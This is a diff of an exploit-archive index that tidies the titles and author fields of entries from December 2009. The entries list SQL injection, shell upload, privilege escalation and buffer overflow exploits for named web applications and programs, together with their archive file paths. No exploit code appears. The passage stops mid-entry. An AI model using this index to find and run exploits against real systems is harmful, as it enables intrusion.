-10444,platforms/php/webapps/10444.txt,"mini Hosting Panel XSRF Change Admin Settings",2009-12-14,"Milos Zivanovic",php,webapps,0 +10444,platforms/php/webapps/10444.txt,"mini Hosting Panel - CSRF Change Admin Settings",2009-12-14,"Milos Zivanovic",php,webapps,0 10445,platforms/php/webapps/10445.txt,"Tender System 0.9.5b LFI",2009-12-14,Packetdeath,php,webapps,0 10446,platforms/php/webapps/10446.txt,"WSCreator 1.1 Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps,0 10447,platforms/php/webapps/10447.txt,"Traidnt Discovery - [CSRF] Create Staff Account",2009-12-14,G0D-F4Th3r,php,webapps,0 10448,platforms/multiple/webapps/10448.txt,"Oracle E-Business Suite Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 -10449,platforms/asp/webapps/10449.txt,"EEGshop v1.2 SQL Injection Vulnerability",2009-12-15,Securitylab.ir,asp,webapps,0 +10449,platforms/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection Vulnerability",2009-12-15,Securitylab.ir,asp,webapps,0 10450,platforms/php/webapps/10450.txt,"Linkster PHP/MySQL SQL Injection Vulnerability",2009-12-15,"Angela Zhang",php,webapps,0 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0 10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro CSRF Change Admin Password",2009-12-15,"Milos Zivanovic",php,webapps,0 10453,platforms/php/webapps/10453.txt,"SitioOnline SQL Injection Vulnerability",2009-12-15,4lG3r14n0-t3r0,php,webapps,0 10454,platforms/php/webapps/10454.txt,"Ez Faq Maker Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 -10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection Vulnerability",2009-12-15,Red-D3v1L,asp,webapps,0 +10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm Cms <= 1.0 - (PageId) Remote SQL Injection Vulnerability",2009-12-15,Red-D3v1L,asp,webapps,0 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP(sitedetails.asp siteid) SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 -10457,platforms/asp/webapps/10457.txt,"LinkPal v1.0 SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 -10458,platforms/php/webapps/10458.txt,"Ez Blog v1.0 (XSS/XSRF) Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 -10461,platforms/php/webapps/10461.txt,"Ez Cart v1.0 Multiple XSRF Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 -10462,platforms/php/webapps/10462.txt,"DubSite CMS v1.0 CSRF Vulnerability",2009-12-15,Connection,php,webapps,0 -10463,platforms/php/webapps/10463.txt,"iGaming CMS v1.5 CSRF Vulnerability",2009-12-15,NeX,php,webapps,0 -10464,platforms/asp/webapps/10464.txt,"GalleryPal FE v1.5(Auth Bypass)",2009-12-15,R3d-D3v!L,asp,webapps,0 -10465,platforms/asp/webapps/10465.txt,"SitePal v1.1(Auth Bypass) SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 +10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 +10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - XSS/CSRF Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 +10461,platforms/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple CSRF Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0 +10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - CSRF Vulnerability",2009-12-15,Connection,php,webapps,0 +10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - CSRF Vulnerability",2009-12-15,NeX,php,webapps,0 +10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5- Auth Bypass",2009-12-15,R3d-D3v!L,asp,webapps,0 +10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Auth Bypass) SQL Injection Vulnerability",2009-12-15,R3d-D3v!L,asp,webapps,0 10467,platforms/php/webapps/10467.txt,"Family Connections <= 2.1.3 Multiple Remote Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 Denial of Service Vulnerability",2009-12-16,"Patroklos Argyroudis",linux,dos,80 -10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <== 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-12-16,Red-D3v1L,asp,webapps,0 -10472,platforms/php/webapps/10472.txt,"Recipe Script v5.0 Shell Upload/XSRF/XSS Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 +10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Auth Bypass) SQL Injection Vulnerability",2009-12-16,Red-D3v1L,asp,webapps,0 +10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Shell Upload/CSRF/XSS Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 10473,platforms/asp/webapps/10473.txt,"V-SpacePal SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,asp,webapps,0 10474,platforms/php/webapps/10474.txt,"Article Directory SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,php,webapps,0 10475,platforms/windows/local/10475.txt,"QuickHeal antivirus 2010 Local Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 -10476,platforms/asp/webapps/10476.txt,"RecipePal v1.0 SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,asp,webapps,0 +10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,asp,webapps,0 10478,platforms/php/webapps/10478.txt,"iSupport <= 1.8 XSS/LFI Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 -10479,platforms/php/webapps/10479.txt,"OSSIM v2.1.5 SQL Injection Vulnerability",2009-12-16,"Nahuel Grisolia",php,webapps,0 -10480,platforms/php/webapps/10480.txt,"OSSIM v2.1.5 Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 -10481,platforms/php/webapps/10481.txt,"OSSIM v2.1.5 Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 +10479,platforms/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection Vulnerability",2009-12-16,"Nahuel Grisolia",php,webapps,0 +10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 +10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 10482,platforms/asp/webapps/10482.txt,"Codefixer Membership Remote Database Disclosure Vulnerability",2009-12-16,ViRuSMaN,asp,webapps,0 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script Remote Database Disclosure Vulnerability",2009-12-16,ViRuSMaN,asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability",2009-12-16,"Maxim A. Kulakov",windows,local,0 @@ -9748,18 +9748,18 @@ id,file,description,date,author,platform,type,port 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS sql Injection Vulnerability",2009-12-16,"Dr.0rYX and Cr3w-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 SQL Injection Vulnerability",2009-12-16,"Dr.0rYX and Cr3w-DZ",php,webapps,0 -10495,platforms/php/webapps/10495.txt,"PhpLinkExchange v1.02 - XSS/Upload Vulerability",2009-12-16,Stink',php,webapps,0 +10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - XSS/Upload Vulerability",2009-12-16,Stink',php,webapps,0 10496,platforms/asp/webapps/10496.txt,"freekot (auth bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,asp,webapps,0 -10497,platforms/php/webapps/10497.txt,"FILE SHARE v1.0 SQL Injection Vulnerability",2009-12-16,"TOP SAT 13",php,webapps,0 +10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection Vulnerability",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System (department.php id) SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,php,webapps,0 -10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 (XSRF/XSS) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 +10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - CSRF/XSS Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate (Auth Bypass) SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem(player.asp player_id) Remote SQL Injection Vulnerability",2009-12-16,R3d-D3v!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM(Auth Bypass) Remote SQL Injection",2009-12-16,R3d-D3v!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest (edit.asp ID) Blind SQL Injection",2009-12-16,R3d-D3v!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad(campaignEdit.asp CCam) Blind SQL Injection",2009-12-16,R3d-D3v!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 -10507,platforms/asp/webapps/10507.txt,"Charon Cart v3 (ContentID) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 +10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload Vulnerability",2009-12-17,"wlhaan Hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 ""PHP_SELF"" XSS vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 @@ -9768,20 +9768,20 @@ id,file,description,date,author,platform,type,port 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,"RENO ",php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 Multiple CSRF Vulnerability",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script CSRF Vulnerability",2009-12-17,bi0,php,webapps,0 -10520,platforms/asp/webapps/10520.txt,"Active Auction House v 3.6 Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 +10520,platforms/asp/webapps/10520.txt,"Active Auction House v 3.6 Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection",2009-12-17,R3d-D3v!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 SQL Bypass Vulnerability",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET SQL Bypass",2009-12-17,bi0,asp,webapps,0 -10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell v6.2 (buyersend.asp catid) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 +10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software Remote SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,php,webapps,0 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,php,webapps,0 -10529,platforms/asp/webapps/10529.txt,"eWebquiz v8 Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 +10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection Vulnerability",2009-12-17,R3d-D3v!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS Cross Site Scripting Vulnerability",2009-12-17,loneferret,php,webapps,0 -10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart Remote Code Execution Vulnerability",2009-12-17," Braeden Thomas",php,webapps,0 +10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart Remote Code Execution Vulnerability",2009-12-17," Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart 'product_id' Parameter SQL Injection Vulnerability",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a cross site scripting vulnerability",2009-12-17,"Hadi Kiamarsi",php,webapps,0 -10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont V2. SQL Injection Vulnerability",2009-12-18,Gamoscu,php,webapps,0 +10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont 2.x - SQL Injection Vulnerability",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 Remote FIle Include Exploit",2009-12-18,cr4wl3r,php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart Remote SQL Injection Vulnerability",2009-12-18,R3d-D3v!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP SERVER Buffer Overflow remote exploit",2009-12-18,Molotov,windows,remote,69 @@ -9795,18 +9795,18 @@ id,file,description,date,author,platform,type,port 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal Blind SQL Injection Vulnerability",2009-12-18,"Fl0riX ",php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 Multiple RFI Exploit",2009-12-19,cr4wl3r,php,webapps,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 -10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware v7.3.1.007 Vulnerability",2009-12-19,Global-Evolution,php,webapps,0 +10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 symlink() open_basedir bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 -10558,platforms/asp/webapps/10558.txt,"Toast Forums v1.8 Database Disclosure Vulnerability",2009-12-19,ViRuSMaN,asp,webapps,0 +10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure Vulnerability",2009-12-19,ViRuSMaN,asp,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,cr4wl3r,php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS SQL Injection Exploit",2009-12-19,cr4wl3r,php,webapps,0 10562,platforms/php/webapps/10562.txt,"Ptag <= 4.0.0 Multiple RFI Exploit",2009-12-19,cr4wl3r,php,webapps,0 10563,platforms/windows/local/10563.py,"PlayMeNow Malformed M3U Playlist WinXP Universal BOF",2009-12-19,loneferret,windows,local,0 10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 Multiple RFI Exploit",2009-12-19,cr4wl3r,php,webapps,0 -10566,platforms/php/webapps/10566.txt,"Explorer V7.20 Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 +10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0 -10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability",2009-12-20,"Master Mind",php,webapps,0 +10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload Vulnerability",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 Multiple Local File Inclusion Vulnerabilities",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Z0D Vulnerability",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS vulnerability",2009-12-20,K053,php,webapps,0 @@ -9814,7 +9814,7 @@ id,file,description,date,author,platform,type,port 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. Database Disclosure Vulnerability",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader Remote File Upload Vulnerability",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 -10576,platforms/asp/webapps/10576.txt,"Angelo-emlak v1.0 Database Disclosure Vulnerability",2009-12-21,LionTurk,asp,webapps,0 +10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure Vulnerability",2009-12-21,LionTurk,asp,webapps,0 10577,platforms/windows/local/10577.pl,"PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 Remote File Upload Vulnerability",2009-12-21,"Master Mind",php,webapps,0 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation Vulnerability PoC Exploit",2009-12-21,"RedTeam Pentesting",multiple,remote,0 @@ -9825,7 +9825,7 @@ id,file,description,date,author,platform,type,port 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection Vulnerability",2009-12-21,_ƯNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS SQL Injection Vulnerability",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 -10588,platforms/php/webapps/10588.txt,"PDQ Script 1.0 <== [listingid] SQL Injection",2009-12-21,SecurityRules,php,webapps,0 +10588,platforms/php/webapps/10588.txt,"PDQ Script <= 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 10590,platforms/php/webapps/10590.txt,"PHPhotoalbum v0.5 SQL Injection Vulnerability",2009-12-21,Stack,php,webapps,0 10591,platforms/php/webapps/10591.txt,"Joomla Component com_mediaslide Directory Traversal Vulnerability",2009-12-21,Mr.tro0oqy,php,webapps,0 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 Cross Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 @@ -9833,18 +9833,18 @@ id,file,description,date,author,platform,type,port 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0 -10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks v1.3 SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0 +10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0 10598,platforms/php/webapps/10598.txt,"DeluxeBB <= 1.3 Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage v0.4 Local File Inclusion Vulnerability",2009-12-22,BAYBORA,php,webapps,0 -10601,platforms/php/webapps/10601.txt,"Mini File Host v1.5 Remote File Upload Vulnerability",2009-12-22,Mr.Z,php,webapps,0 +10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload Vulnerability",2009-12-22,Mr.Z,php,webapps,0 10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 WinXP SP3",2009-12-22,d3b4g,windows,local,0 -10603,platforms/windows/dos/10603.c,"TFTP Daemon v1.9 Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 +10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0 10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0 -10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0 +10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,"indoushka salah el ddine",php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0 10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery Directory Traversal Vulnerability",2009-12-23,Mr.tro0oqy,php,webapps,0 @@ -9853,7 +9853,7 @@ id,file,description,date,author,platform,type,port 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat (CVE-2009-4324) Exploit",2009-12-23,"Ahmed Obied",windows,local,0 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 local BOF xp sp2",2009-12-23,bibi-info,windows,local,0 10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 BoF Exploit",2009-12-23,dijital1,windows,local,0 -10621,platforms/php/webapps/10621.txt,"XP Book v3.0 login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 +10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan Hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross Site Scripting Vulnerability",2009-12-24,Fl0riX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,Fl0riX,php,webapps,0 10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0 @@ -9862,89 +9862,89 @@ id,file,description,date,author,platform,type,port 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0 10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability",2009-12-24,Mr.SeCreT,php,webapps,0 -10634,platforms/linux/dos/10634.txt,"Picpuz <=2.1.1 Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 +10634,platforms/linux/dos/10634.txt,"Picpuz <= 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 10637,platforms/asp/webapps/10637.txt,"Web Wiz NewsPad Database Disclosure Vulnerability",2009-12-24,"ViRuSMaN ",asp,webapps,0 -10638,platforms/asp/webapps/10638.txt,"Web Wiz Forums v9.64 Database Disclosure Vulnerability",2009-12-24,ViRuSMaN,asp,webapps,0 +10638,platforms/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure Vulnerability",2009-12-24,ViRuSMaN,asp,webapps,0 10639,platforms/asp/webapps/10639.txt,"Snitz Forums 2000 Database Disclosure Vulnerability",2009-12-24,ViRuSMaN,asp,webapps,0 10640,platforms/php/webapps/10640.txt,"Joomla Component com_schools SQL injection",2009-12-24,Mr.tro0oqy,php,webapps,0 10642,platforms/windows/local/10642.rb,"Exploit Easy RM to MP3 2.7.3.700 - Ruby",2009-12-24,"John Babio",windows,local,0 -10645,platforms/php/webapps/10645.txt,"PBX Phone System v2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 +10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 10646,platforms/windows/local/10646.c,"CastRipper (.M3U) Stack BOF WinXP SP2",2009-12-24,bibi-info,windows,local,0 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0 10648,platforms/php/webapps/10648.txt,"cms -db <= v0.7.13 Multiple Vulnerabilities",2009-12-25,cp77fk4r,php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 10650,platforms/windows/dos/10650.pl,"jetAudio v 8.0.0.0 Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 -10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0 -10653,platforms/php/webapps/10653.txt,"Winn Guestbook V2.4, Winn.ws Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 -10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 -10655,platforms/php/webapps/10655.txt,"Best Top List Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 +10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 +10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 +10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 +10655,platforms/php/webapps/10655.txt,"Best Top List Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace SQL Injection Vulnerability",2009-12-25,"AnGrY BoY",php,webapps,0 -10658,platforms/php/webapps/10658.txt,"caricatier 2.5 Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 -10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell Vulnerability",2009-12-25,indoushka,php,webapps,0 -10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 +10658,platforms/php/webapps/10658.txt,"caricatier 2.5 Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 +10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 +10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross Site Scripting Vulnerability",2009-12-25,"indoushka salah el ddine",php,webapps,0 10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit",2009-12-25,Encrypt3d.M!nd,windows,local,0 10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 -10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 Cross Site Scripting 